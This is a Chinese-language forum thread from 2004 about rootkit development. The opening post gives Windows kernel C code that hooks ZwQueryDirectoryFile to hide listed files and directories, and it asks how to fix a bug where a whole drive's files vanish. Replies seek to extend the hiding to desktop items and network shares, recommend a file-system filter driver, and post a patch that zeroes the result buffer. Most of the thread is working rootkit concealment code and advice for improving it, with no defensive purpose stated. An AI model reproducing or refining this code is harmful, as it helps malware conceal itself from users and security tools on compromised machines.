|
阅读:1247回复:4
rootkil中隐藏文件的一个漏洞
typedef struct _FILETIME
{ DWORD dwLowDateTime; DWORD dwHighDateTime; } FILETIME; typedef struct _DirEntry { DWORD dwLenToNext; DWORD dwAttr; FILETIME ftCreate, ftLastAccess, ftLastWrite; DWORD dwUnknown[ 2 ]; DWORD dwFileSizeLow; DWORD dwFileSizeHigh; DWORD dwUnknown2[ 3 ]; WORD wNameLen; WORD wUnknown; DWORD dwUnknown3; WORD wShortNameLen; WCHAR swShortName[ 12 ]; WCHAR suName[ 1 ]; } DirEntry, *PDirEntry; struct _SYSTEM_THREADS { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientIs; KPRIORITY Priority; KPRIORITY BasePriority; ULONG ContextSwitchCount; ULONG ThreadState; KWAIT_REASON WaitReason; }; // 隐藏目录/文件 NTSTATUS HookZwQueryDirectoryFile( IN HANDLE hFile, IN HANDLE hEvent OPTIONAL, IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL, IN PVOID IoApcContext OPTIONAL, OUT PIO_STATUS_BLOCK pIoStatusBlock, OUT PVOID FileInformationBuffer, IN ULONG FileInformationBufferLength, IN FILE_INFORMATION_CLASS FileInfoClass, IN BOOLEAN bReturnOnlyOneEntry, IN PUNICODE_STRING PathMask OPTIONAL, IN BOOLEAN bRestartQuery) { NTSTATUS rc; CHAR aProcessName[80]; ANSI_STRING ansiFileName,ansiDirName; UNICODE_STRING uniFileName; PP_DIR ptr; WCHAR ParentDirectory[1024] = {0}; int BytesReturned; PVOID Object; // 执行旧的ZwQueryDirectoryFile函数 rc = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile))( hFile, hEvent, IoApcRoutine, IoApcContext, pIoStatusBlock, FileInformationBuffer, FileInformationBufferLength, FileInfoClass, bReturnOnlyOneEntry, PathMask, bRestartQuery); if(NT_SUCCESS(rc)) { PDirEntry p; PDirEntry pLast; BOOL bLastOne; int found; p = (PDirEntry)FileInformationBuffer; // 将查找出来结果赋给结构 pLast = NULL; do { bLastOne = !( p->dwLenToNext ); RtlInitUnicodeString(&uniFileName,p->suName); RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE); RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE); RtlUpperString(&ansiFileName,&ansiDirName); found=0; // 在链表中查找是否包含当前目录 for(ptr = list_head; ptr != NULL; ptr = ptr->next) { if (ptr->flag != PTR_HIDEDIR) continue; if( RtlCompareMemory( ansiFileName.Buffer, ptr->name,strlen(ptr->name) ) == strlen(ptr->name)) { found=1; break; } }//end for // 如果链表中包含当前目录,隐藏 if(found) { if(bLastOne) { if(p == (PDirEntry)FileInformationBuffer ) { rc = 0x80000006; //隐藏 此处是指仅有一个文件的情况,可对于一个包含多个文件的盘或目录,若要隐藏的文件正好位于第一个时,其dwLenToNext也为0,也就是说bLASTONE是TRUE,此时返回 0x80000006,表示NO-MORE-FILES,其它文件也就无法显示,整个盘的文件全被隐藏,对于这个问题该如何解决,大家多多出招!!!!!!!!! } else pLast->dwLenToNext = 0; break; } else { int iPos = ((ULONG)p) - (ULONG)FileInformationBuffer; int iLeft = (DWORD)FileInformationBufferLength - iPos - p->dwLenToNext; RtlCopyMemory( (PVOID)p, (PVOID)( (char *)p + p->dwLenToNext ), (DWORD)iLeft ); continue; } } pLast = p; p = (PDirEntry)((char *)p + p->dwLenToNext ); }while( !bLastOne ); RtlFreeAnsiString(&ansiDirName); RtlFreeAnsiString(&ansiFileName); } return(rc); } |
|
最新喜欢: TH1999
|
|
沙发#
发布于:2004-11-25 11:00
另外,这种方法若开机后加载驱动无法隐藏桌面上的东西,对共享的文件包只能实现本地隐藏,网络上的其它机器仍能看到,如何把这些情况全部隐藏。
大家多多出招!!!!!! |
|
|
板凳#
发布于:2004-11-25 13:28
建议采用FSD FILTER来做,HOOK NATIVE API功能实在有限.
|
|
|
|
地板#
发布于:2004-11-25 20:53
楼上兄弟,在哪里有FSD FILTER,介绍一下,我每接触这方面的东西,谢谢!!!!!!!!!!
|
|
|
地下室#
发布于:2004-12-25 01:47
我刚好在看这些代码,也发现了这个问题,开始觉得挺奇怪,后来用softice才找到原因。
解决方法也很简单,将rc = STATUS_NO_MORE_FILES那句替换成以下即可: RtlZeroMemory(FileInformationBuffer, FileInformationBufferLength); 我的测试通过了,你可以试试看。 |
|